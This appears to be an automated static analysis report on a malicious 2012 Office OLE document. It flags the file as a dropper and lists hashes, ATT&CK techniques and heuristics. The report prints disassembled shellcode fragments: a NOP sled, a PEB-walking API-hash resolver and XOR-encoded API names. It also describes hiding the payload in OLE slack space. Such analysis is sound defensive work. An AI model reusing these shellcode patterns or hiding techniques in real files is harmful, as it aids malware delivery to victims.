Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e81eee32d819be17…

MALICIOUS

Office (OLE)

207.4 KB First seen: 2012-06-14
MD5: f4b7e3791eaa0223953fbf134e0ff81b SHA-1: 12d5f6148ba6b616e5638af1b6d2d008d275bac1 SHA-256: e81eee32d819be17540e317edec3d2743c18ef51e69cb152d34d4b79c0939925
300 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1203 Exploitation for Client Execution

The file is an OLE document with significant slack space and an appended executable payload, which suggests a dropper. Heuristics indicate NOP sleds, PEB access, API-hash resolvers, and XOR-encoded strings, all common in shellcode. The appended payload and shellcode-like resolver strongly suggest that the file's primary purpose is to execute a secondary stage. No specific family is identifiable from the provided evidence.

Heuristics 7

  • XOR-encoded strings (key 0xFF) critical SC_XOR_ENCODED
    Found 8 Windows library/API name(s) XOR-encoded with single-byte key 0xFF: 'KERNEL32.DLL', 'ADVAPI32.DLL', 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc', 'VirtualProtect', 'ExitProcess', 'CreateFileA'
    Disassembly
    Attempted x86 opcode disassembly (of the XOR-encoded string region: these bytes decode with key 0xFF to the library/API names listed above, so the instruction listing below is an artifact of disassembling data rather than code)
    00005098  b4ba              mov ah, 0xba
    0000509A  ad                lodsd eax, dword ptr [esi]
    0000509B  b1ba              mov cl, 0xba
    0000509D  b3cc              mov bl, 0xcc
    0000509F  cdd1              int 0xd1
    000050A1  bbb3b3ffbe        mov ebx, 0xbeffb3b3
    000050A6  bba9beafb6        mov ebx, 0xb6afbea9
    000050AB  cc                int3
    000050AC  cdd1              int 0xd1
    000050AE  bbb3b3ffb2        mov ebx, 0xb2ffb3b3
    000050B3  ac                lodsb al, byte ptr [esi]
    000050B4  a9bcadabd1        test eax, 0xd1abadbc
    000050B9  bbb3b3ffff        mov ebx, 0xffffb3b3
    000050BE  ffb3909e9bb3      push dword ptr [ebx - 0x4c646170]
    000050C4  96                xchg esi, eax
    000050C5  9d                popfd
    000050C6  8d9e8d86beff      lea ebx, [esi - 0x417973]
    000050CC  ff                .byte 0xff
    000050CD  ff                .byte 0xff
    000050CE  b89a8baf8d        mov eax, 0x8daf8b9a
    000050D3  90                nop
    000050D4  9c                pushfd
    000050D5  be9b9b8d9a        mov esi, 0x9a8d9b9b
    000050DA  8c8cffffffa996    mov word ptr [edi + edi*8 - 0x69560001], cs
    000050E1  8d8b8a9e93af      lea ecx, [ebx - 0x506c6176]
    000050E7  8d908b9a9c8b      lea edx, [eax - 0x74636575]
    000050ED  ff                .byte 0xff
    000050EE  ff                .byte 0xff
    000050EF  ffa9968d8b8a      jmp ptr [ecx - 0x7574726a]
    000050F5  9e                sahf
    000050F6  93                xchg ebx, eax
    000050F7  be                .byte 0xbe
  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly
    Attempted x86 opcode disassembly (note: the jmp at 0x488 targets 0x493, so the instructions decoded at 0x490 and 0x496 are artifacts of linearly disassembling through the 0xFF filler bytes; the listing is back in sync from 0x498 onward)
    00000449  90                nop
    0000044A  90                nop
    0000044B  90                nop
    0000044C  90                nop
    0000044D  90                nop
    0000044E  90                nop
    0000044F  90                nop
    00000450  90                nop
    00000451  90                nop
    00000452  90                nop
    00000453  90                nop
    00000454  90                nop
    00000455  90                nop
    00000456  90                nop
    00000457  90                nop
    00000458  90                nop
    00000459  90                nop
    0000045A  90                nop
    0000045B  90                nop
    0000045C  90                nop
    0000045D  90                nop
    0000045E  90                nop
    0000045F  90                nop
    00000460  90                nop
    00000461  90                nop
    00000462  90                nop
    00000463  90                nop
    00000464  90                nop
    00000465  90                nop
    00000466  90                nop
    00000467  90                nop
    00000468  90                nop
    00000469  90                nop
    0000046A  90                nop
    0000046B  90                nop
    0000046C  90                nop
    0000046D  90                nop
    0000046E  90                nop
    0000046F  90                nop
    00000470  90                nop
    00000471  90                nop
    00000472  90                nop
    00000473  90                nop
    00000474  90                nop
    00000475  90                nop
    00000476  90                nop
    00000477  90                nop
    00000478  90                nop
    00000479  40                inc eax
    0000047A  90                nop
    0000047B  4e                dec esi
    0000047C  56                push esi
    0000047D  ff550c            call dword ptr [ebp + 0xc]
    00000480  55                push ebp
    00000481  8bec              mov ebp, esp
    00000483  51                push ecx
    00000484  53                push ebx
    00000485  8b7d08            mov edi, dword ptr [ebp + 8]
    00000488  eb09              jmp 0x493
    0000048A  ff                .byte 0xff
    0000048B  ff                .byte 0xff
    0000048C  ff                .byte 0xff
    0000048D  ff                .byte 0xff
    0000048E  ff                .byte 0xff
    0000048F  ff                .byte 0xff
    00000490  ff9090908b5d      call dword ptr [eax + 0x5d8b9090]
    00000496  0c56              or al, 0x56
    00000498  8b733c            mov esi, dword ptr [ebx + 0x3c]
    0000049B  8b741e78          mov esi, dword ptr [esi + ebx + 0x78]
    0000049F  03f3              add esi, ebx
    000004A1  56                push esi
    000004A2  8b7620            mov esi, dword ptr [esi + 0x20]
    000004A5  03f3              add esi, ebx
    000004A7  33c9              xor ecx, ecx
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    Attempted x86 opcode disassembly
    000003B3  64a130000000      mov eax, dword ptr fs:[0x30]
    000003B9  8b400c            mov eax, dword ptr [eax + 0xc]
    000003BC  8b701c            mov esi, dword ptr [eax + 0x1c]
    000003BF  ad                lodsd eax, dword ptr [esi]
    000003C0  8b7008            mov esi, dword ptr [eax + 8]
    000003C3  81ec00070000      sub esp, 0x700
    000003C9  8bec              mov ebp, esp
    000003CB  e912010000        jmp 0x4e2
    000003D0  5b                pop ebx
    000003D1  33c9              xor ecx, ecx
    000003D3  b10c              mov cl, 0xc
    000003D5  56                push esi
    000003D6  ff33              push dword ptr [ebx]
    000003D8  e8a3000000        call 0x480
    000003DD  89448d00          mov dword ptr [ebp + ecx*4], eax
    000003E1  83c304            add ebx, 4
    000003E4  e2ef              loop 0x3d5
    000003E6  33f6              xor esi, esi
    000003E8  bfe82d0000        mov edi, 0x2de8
    000003ED  c74554c20f0300    mov dword ptr [ebp + 0x54], 0x30fc2
    000003F4  037d54            add edi, dword ptr [ebp + 0x54]
    000003F7  897558            mov dword ptr [ebp + 0x58], esi
    000003FA  83455804          add dword ptr [ebp + 0x58], 4
    000003FE  56                push esi
    000003FF  ff7558            push dword ptr [ebp + 0x58]
    00000402  ff552c            call dword ptr [ebp + 0x2c]
    00000405  3bc7              cmp eax, edi
    00000407  740b              je 0x414
    00000409  817d5800000100    cmp dword ptr [ebp + 0x58], 0x10000
    00000410  7432              je 0x444
    00000412  eb                .byte 0xeb
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly
    Attempted x86 opcode disassembly (identical to the PEB-access excerpt above; no rotate/hash instructions fall within the bytes shown, so the ROR13 attribution presumably rests on bytes outside this excerpt)
    000003B3  64a130000000      mov eax, dword ptr fs:[0x30]
    000003B9  8b400c            mov eax, dword ptr [eax + 0xc]
    000003BC  8b701c            mov esi, dword ptr [eax + 0x1c]
    000003BF  ad                lodsd eax, dword ptr [esi]
    000003C0  8b7008            mov esi, dword ptr [eax + 8]
    000003C3  81ec00070000      sub esp, 0x700
    000003C9  8bec              mov ebp, esp
    000003CB  e912010000        jmp 0x4e2
    000003D0  5b                pop ebx
    000003D1  33c9              xor ecx, ecx
    000003D3  b10c              mov cl, 0xc
    000003D5  56                push esi
    000003D6  ff33              push dword ptr [ebx]
    000003D8  e8a3000000        call 0x480
    000003DD  89448d00          mov dword ptr [ebp + ecx*4], eax
    000003E1  83c304            add ebx, 4
    000003E4  e2ef              loop 0x3d5
    000003E6  33f6              xor esi, esi
    000003E8  bfe82d0000        mov edi, 0x2de8
    000003ED  c74554c20f0300    mov dword ptr [ebp + 0x54], 0x30fc2
    000003F4  037d54            add edi, dword ptr [ebp + 0x54]
    000003F7  897558            mov dword ptr [ebp + 0x58], esi
    000003FA  83455804          add dword ptr [ebp + 0x58], 4
    000003FE  56                push esi
    000003FF  ff7558            push dword ptr [ebp + 0x58]
    00000402  ff552c            call dword ptr [ebp + 0x2c]
    00000405  3bc7              cmp eax, edi
    00000407  740b              je 0x414
    00000409  817d5800000100    cmp dword ptr [ebp + 0x58], 0x10000
    00000410  7432              je 0x444
    00000412  eb                .byte 0xeb
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 212,394 bytes but its declared streams total only 8,298 bytes — 204,096 bytes (96%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOAD
    OLE compound file contains a large high-entropy region beyond the declared major streams, and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
  • OLE file contains raw shellcode-like resolver payload high OLE_RAW_SHELLCODE_PAYLOAD
    Malformed or legacy OLE file contains raw PEB/API-resolver shellcode bytes at the file level, including loader-walk instructions and a nearby payload marker. This indicates an exploit payload carrier but does not identify a specific parser CVE.